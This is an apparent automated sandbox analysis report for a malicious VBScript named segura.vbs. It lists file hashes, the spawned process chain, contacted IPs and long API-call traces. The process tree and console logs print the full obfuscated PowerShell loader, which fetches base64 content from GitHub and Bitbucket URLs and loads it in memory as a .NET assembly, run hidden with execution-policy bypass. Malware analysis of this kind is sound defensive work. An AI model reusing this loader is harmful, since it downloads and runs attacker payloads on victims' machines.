Summary | ZeroBOX

segura.vbs

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 5, 2024, 9:15 a.m. Oct. 5, 2024, 9:25 a.m.
Size 483.8KB
Type Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 52917612f2ba8deed79d211c0bd5746f
SHA256 76909f885c6b7247c7176b2cc08830c78b8b831bf7d3f0d9eec38da53e8ae93b
CRC32 D8B2FFCF
ssdeep 12288:3FIsz/Eb1lVfwxg6kUTGuimfRkZGOm76nrONHcIZgBVU4UupEFgAA0bOpZc+wGc8:3Dmjp7BFr
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\segura.vbs

    2532
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsJysnID0gezJ9aHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXMnKydlcmNvbicrJ3QnKydlbnQuY29tL04nKydvJysnRCcrJ2V0JysnZWN0T24nKycvTm9EZScrJ3RlY3RPJysnbi9yZWYnKydzJysnLycrJ2gnKydlJysnYScrJ2RzL21haW4nKycvRGV0YWhOb3RoLVYnKycudHh0ezJ9JysnOyB7MX1iJysnYXMnKydlJysnNjQnKydDb250ZScrJ250JysnID0gJysnKE5ldy1PYmplY3QnKycgU3knKydzdGVtLicrJ05ldC4nKydXZWJDbGllJysnbnQpLkRvJysnd24nKydsb2FkU3RyaScrJ24nKydnKHsxfXVyJysnbCk7JysnICcrJ3sxJysnfWJpbicrJ2EnKydyeUNvbnQnKydlbnQnKycgJysnPScrJyBbU3knKydzdCcrJ2VtLkMnKydvbicrJ3YnKydlJysncnRdJysnOjpGcicrJ29tQmFzJysnZTY0U3RyaScrJ25nKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnOycrJyB7MScrJ31hc3NlbWJsJysneScrJyA9IFtSZWZsZWN0JysnaW9uJysnLkEnKydzc2VtYmwnKyd5XScrJzonKyc6JysnTG9hZCh7MX1iaW5hcicrJ3lDb250ZScrJ250KTsnKycgW2RubCcrJ2knKydiLkknKydPJysnLkgnKydvbWVdJysnOjpWQUkoezB9dHh0LkpOcmFUL3NkYW9sJysnbicrJ3dvZC8ycmF0L2YnKydhc2ZzJysnYWZzbHNkcycrJ2RsdmV1bi8nKydncicrJ28udGUnKydrYycrJ3VidGliLycrJy86c3B0dGh7MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sICcrJ3snKycwfWQnKydlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZCcrJ297MH0sICcrJ3snKycwfWFzcCcrJ25ldF9yZScrJ2dzcWx7JysnMCcrJ30nKycsICcrJ3swfScrJ3swfSx7MH17MH0nKycpJykgLWZbY0hBcl0zNCxbY0hBcl0zNixbY0hBcl0zOSl8ICYoICRQc0hPTWVbMjFdKyRQc2hPbWVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

      2616
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url'+' = {2}https://'+'ra'+'w.'+'githubus'+'ercon'+'t'+'ent.com/N'+'o'+'D'+'et'+'ectOn'+'/NoDe'+'tectO'+'n/ref'+'s'+'/'+'h'+'e'+'a'+'ds/main'+'/DetahNoth-V'+'.txt{2}'+'; {1}b'+'as'+'e'+'64'+'Conte'+'nt'+' = '+'(New-Object'+' Sy'+'stem.'+'Net.'+'WebClie'+'nt).Do'+'wn'+'loadStri'+'n'+'g({1}ur'+'l);'+' '+'{1'+'}bin'+'a'+'ryCont'+'ent'+' '+'='+' [Sy'+'st'+'em.C'+'on'+'v'+'e'+'rt]'+'::Fr'+'omBas'+'e64Stri'+'ng({'+'1}base64Cont'+'ent)'+';'+' {1'+'}assembl'+'y'+' = [Reflect'+'ion'+'.A'+'ssembl'+'y]'+':'+':'+'Load({1}binar'+'yConte'+'nt);'+' [dnl'+'i'+'b.I'+'O'+'.H'+'ome]'+'::VAI({0}txt.JNraT/sdaol'+'n'+'wod/2rat/f'+'asfs'+'afslsds'+'dlveun/'+'gr'+'o.te'+'kc'+'ubtib/'+'/:sptth{0}, {0}desativado{0'+'}, '+'{'+'0}d'+'es'+'ativado{0}, {0}desativad'+'o{0}, '+'{'+'0}asp'+'net_re'+'gsql{'+'0'+'}'+', '+'{0}'+'{0},{0}{0}'+')') -f[cHAr]34,[cHAr]36,[cHAr]39)| &( $PsHOMe[21]+$PshOme[34]+'x')"

        2760

IP Address Status Action
164.124.101.2 Active Moloch
185.199.109.133 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadString" with "1" argument(s): "The underlying connec
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: tion was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:164
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $url = 'https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/ma
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: in/DetahNoth-V.txt'; $base64Content = (New-Object System.Net.WebClient).Downloa
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: dString <<<< ($url); $binaryContent = [System.Convert]::FromBase64String($base6
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: 4Content); $assembly = [Reflection.Assembly]::Load($binaryContent); [dnlib.IO.H
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ome]::VAI("txt.JNraT/sdaolnwod/2rat/fasfsafslsdsdlveun/gro.tekcubtib//:sptth",
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: "desativado", "desativado", "desativado", "aspnet_regsql", "","")
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly
console_handle: 0x000000bb
1 1 0

WriteConsoleW

buffer: '0 bytes loaded from System.Management.Automation, Version=1.0.0.0, Culture=ne
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: utral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An attempt
console_handle: 0x000000d3
1 1 0

WriteConsoleW

buffer: was made to load a program with an incorrect format."
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: At line:1 char:280
console_handle: 0x000000eb
1 1 0

WriteConsoleW

buffer: + $url = 'https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/ma
console_handle: 0x000000f7
1 1 0

WriteConsoleW

buffer: in/DetahNoth-V.txt'; $base64Content = (New-Object System.Net.WebClient).Downloa
console_handle: 0x00000103
1 1 0

WriteConsoleW

buffer: dString($url); $binaryContent = [System.Convert]::FromBase64String($base64Conte
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: nt); $assembly = [Reflection.Assembly]::Load <<<< ($binaryContent); [dnlib.IO.H
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: ome]::VAI("txt.JNraT/sdaolnwod/2rat/fasfsafslsdsdlveun/gro.tekcubtib//:sptth",
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: "desativado", "desativado", "desativado", "aspnet_regsql", "","")
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: Unable to find type [dnlib.IO.Home]: make sure that the assembly containing thi
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: s type is loaded.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:313
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $url = 'https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/ma
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: in/DetahNoth-V.txt'; $base64Content = (New-Object System.Net.WebClient).Downloa
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: dString($url); $binaryContent = [System.Convert]::FromBase64String($base64Conte
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: nt); $assembly = [Reflection.Assembly]::Load($binaryContent); [dnlib.IO.Home] <
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: <<< ::VAI("txt.JNraT/sdaolnwod/2rat/fasfsafslsdsdlveun/gro.tekcubtib//:sptth",
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: "desativado", "desativado", "desativado", "aspnet_regsql", "","")
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (dnlib.IO.Home:String) [], Run
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: timeException
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : TypeNotFound
console_handle: 0x000000a7
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481cb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00482830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00482830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00482830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00482830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00482830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00482830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004823b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004823b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004823b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481ff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004824f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00481bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004820b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004820b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053b488
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053bd48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053bd48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053bd48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053b4c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053b4c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053b4c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053b4c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053b4c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053b4c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
